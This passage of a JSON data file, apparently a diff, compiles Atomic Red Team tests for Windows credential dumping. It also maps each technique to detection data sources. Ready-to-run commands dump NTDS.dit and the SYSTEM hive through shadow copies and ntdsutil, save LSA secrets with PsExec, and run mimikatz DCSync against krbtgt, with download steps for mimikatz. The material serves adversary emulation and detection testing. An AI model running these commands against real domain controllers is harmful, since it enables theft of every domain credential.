C:\\Windows\\Temp\\ntds_T1003\" q q\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic shadowcopy call create Volume=C:\\\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"#{target_host}\" shadowcopy call create Volume=C:\\\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"localhost\" shadowcopy call create Volume=#{drive_letter}\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d #{target_path}\"\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d c:\\ntds.dit\"\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"localhost\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}\"\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "(gwmi -list win32_shadowcopy).Create('C:\\','ClientAccessible')\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "vssadmin.exe create shadow /for=C:\nmklink /D #{symlink_path} \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "vssadmin.exe create shadow /for=#{drive_letter}\nmklink /D C:\\Temp\\vssstore \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.003", + "display_name": "OS Credential Dumping: NTDS", + "atomic_tests": [ + { + "name": "Create Volume Shadow Copy with vssadmin", + "auto_generated_guid": "dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon)", + "type": "String", + "default": "C:" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + } + ], + "executor": { + "command": "vssadmin.exe create shadow /for=#{drive_letter}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Copy NTDS.dit from Volume Shadow Copy", + "auto_generated_guid": "c6237146-9ea6-4711-85c9-c56d263a6b03", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume Shadow Copy with vssadmin\".\nA successful test also requires the export of the SYSTEM Registry hive.\nThis test must be executed on a Windows Domain Controller.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vsc_name": { + "description": "Name of Volume Shadow Copy", + "type": "String", + "default": "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1" + }, + "extract_path": { + "description": "Path for extracted NTDS.dit", + "type": "Path", + "default": "C:\\Windows\\Temp" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + }, + { + "description": "Volume shadow copy must exist\n", + "prereq_command": "if not exist #{vsc_name} (exit /b 1)\n", + "get_prereq_command": "echo Run \"Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'\" to fulfill this requirement\n" + }, + { + "description": "Extract path must exist\n", + "prereq_command": "if not exist #{extract_path} (exit /b 1)\n", + "get_prereq_command": "mkdir #{extract_path}\n" + } + ], + "executor": { + "command": "copy #{vsc_name}\\Windows\\NTDS\\NTDS.dit #{extract_path}\\ntds.dit\ncopy #{vsc_name}\\Windows\\System32\\config\\SYSTEM #{extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM #{extract_path}\\SYSTEM_HIVE\n", + "cleanup_command": "del \"#{extract_path}\\ntds.dit\" >nul 2> nul\ndel \"#{extract_path}\\VSC_SYSTEM_HIVE\" >nul 2> nul\ndel \"#{extract_path}\\SYSTEM_HIVE\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump Active Directory Database with NTDSUtil", + "auto_generated_guid": "2364e33d-ceab-4641-8468-bfb1d7cc2723", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability\nuses the \"IFM\" or \"Install From Media\" backup functionality that allows Active Directory restoration or installation of\nsubsequent domain controllers without the need of network-based replication.\n\nUpon successful completion, you will find a copy of the ntds.dit file in the C:\\Windows\\Temp directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_folder": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\ntds_T1003" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nntdsutil \"ac i ntds\" \"ifm\" \"create full #{output_folder}\" q q\n", + "cleanup_command": "rmdir /q /s #{output_folder} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy with WMI", + "auto_generated_guid": "224f7de0-8f0a-4a94-b5d8-989b036c86da", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon and backslash)", + "type": "String", + "default": "C:\\" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + } + ], + "executor": { + "command": "wmic shadowcopy call create Volume=#{drive_letter}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy remotely with WMI", + "auto_generated_guid": "d893459f-71f0-484d-9808-ec83b2b64226", + "description": "This test is intended to be run from a remote workstation with domain admin context.\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon and backslash)", + "type": "String", + "default": "C:\\" + }, + "target_host": { + "description": "IP Address / Hostname you want to target", + "type": "String", + "default": "localhost" + } + }, + "dependencies": [ + { + "description": "Target must be a reachable Domain Controller, and current context must be domain admin\n", + "prereq_command": "wmic /node:\"#{target_host}\" shadowcopy list brief\n", + "get_prereq_command": "echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)\n" + } + ], + "executor": { + "command": "wmic /node:\"#{target_host}\" shadowcopy call create Volume=#{drive_letter}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy remotely (WMI) with esentutl", + "auto_generated_guid": "21c7bf80-3e8b-40fa-8f9d-f5b194ff2865", + "description": "This test is intended to be run from a remote workstation with domain admin context.\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "source_path": { + "description": "File to shadow copy", + "type": "String", + "default": "c:\\windows\\ntds\\ntds.dit" + }, + "target_path": { + "description": "Target path of the result file", + "type": "String", + "default": "c:\\ntds.dit" + }, + "target_host": { + "description": "IP Address / Hostname you want to target", + "type": "String", + "default": "localhost" + } + }, + "dependencies": [ + { + "description": "Target must be a reachable Domain Controller, and current context must be domain admin\n", + "prereq_command": "wmic /node:\"#{target_host}\" shadowcopy list brief\n", + "get_prereq_command": "echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)\n" + } + ], + "executor": { + "command": "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}\"\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy with Powershell", + "auto_generated_guid": "542bb97e-da53-436b-8e43-e0a7d31a6c24", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon)", + "type": "String", + "default": "C:\\" + } + }, + "executor": { + "command": "(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Create Symlink to Volume Shadow Copy", + "auto_generated_guid": "21748c28-2793-4284-9e07-d6d028b66702", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon)", + "type": "String", + "default": "C:" + }, + "symlink_path": { + "description": "symlink path", + "type": "String", + "default": "C:\\Temp\\vssstore" + } + }, + "executor": { + "command": "vssadmin.exe create shadow /for=#{drive_letter}\nmklink /D #{symlink_path} \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.004", + "command_list": [ + "PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y" + ], + "commands": [ + { + "command": "PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y", + "source": "atomics/T1003.004/T1003.004.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSA Secrets" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.004", + "display_name": "OS Credential Dumping: LSA Secrets", + "atomic_tests": [ + { + "name": "Dumping LSA Secrets", + "auto_generated_guid": "55295ab0-a703-433b-9ca4-ae13807de12f", + "description": "Dump secrets key from Windows registry\nWhen successful, the dumped file will be written to $env:Temp\\secrets.\nAttackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.\nhttps://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "psexec_exe": { + "description": "Path to PsExec executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})", + "prereq_command": "if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PSTools.zip\"\nExpand-Archive $env:TEMP\\PSTools.zip $env:TEMP\\PSTools -Force\nNew-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\PSTools\\PsExec.exe #{psexec_exe} -Force" + } + ], + "executor": { + "command": "#{psexec_exe} -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y", + "cleanup_command": "del %temp%\\secrets >nul 2> nul", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.005", + "command_list": [ + "cmdkey /list\n" + ], + "commands": [ + { + "command": "cmdkey /list\n", + "source": "atomics/T1003.005/T1003.005.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Cached Domain Credentials" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.005", + "display_name": "OS Credential Dumping: Cached Domain Credentials", + "atomic_tests": [ + { + "name": "Cached Credential Dump via Cmdkey", + "auto_generated_guid": "56506854-89d6-46a3-9804-b7fde90791f9", + "description": "List credentials currently stored on the host via the built-in Windows utility cmdkey.exe\nCredentials listed with Cmdkey only pertain to the current user\nPasswords will not be displayed once they are stored\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey\nhttps://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "cmdkey /list\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.006", + "command_list": [ + "#{mimikatz_path} \"lsadump::dcsync /domain:%userdnsdomain% /user:#{user}@%userdnsdomain%\" \"exit\"\n", + "#{mimikatz_path} \"lsadump::dcsync /domain:#{domain} /user:krbtgt@#{domain}\" \"exit\"\n", + "%tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}\" \"exit\"\n", + "Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart(\"\\\")\n" + ], + "commands": [ + { + "command": "#{mimikatz_path} \"lsadump::dcsync /domain:%userdnsdomain% /user:#{user}@%userdnsdomain%\" \"exit\"\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + }, + { + "command": "#{mimikatz_path} \"lsadump::dcsync /domain:#{domain} /user:krbtgt@#{domain}\" \"exit\"\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + }, + { + "command": "%tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}\" \"exit\"\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + }, + { + "command": "Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart(\"\\\")\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.006", + "display_name": "OS Credential Dumping: DCSync", + "atomic_tests": [ + { + "name": "DCSync (Active Directory)", + "auto_generated_guid": "129efd28-8497-4c87-a1b0-73b9a870ca3e", + "description": "Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.\nWorks against a remote Windows Domain Controller using the replication protocol.\nPrivileges required: domain admin or domain controller account (by default), or any other account with required rights.\n[Reference](https://adsecurity.org/?p=1729)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Targeted Active Directory domain", + "type": "String", + "default": "%userdnsdomain%" + }, + "user": { + "description": "Targeted user", + "type": "String", + "default": "krbtgt" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "%tmp%\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "#{mimikatz_path} \"lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}\" \"exit\"\n" + } + }, + { + "name": "Run DSInternals Get-ADReplAccount", + "auto_generated_guid": "a0bced08-3fc5-4d8b-93b7-e8344739376e", + "description": "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "logonserver": { + "description": "ComputerName argument default %logonserver%", + "type": "String", + "default": "$ENV:logonserver.TrimStart(\"\\\")" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DSInternals must be installed\n", + "prereq_command": "$RequiredModule = Get-Module -Name DSInternals -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}\n", + "get_prereq_command": "Install-Module -Name DSInternals -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Get-ADReplAccount -All -Server #{logonserver}\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "ad object" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as 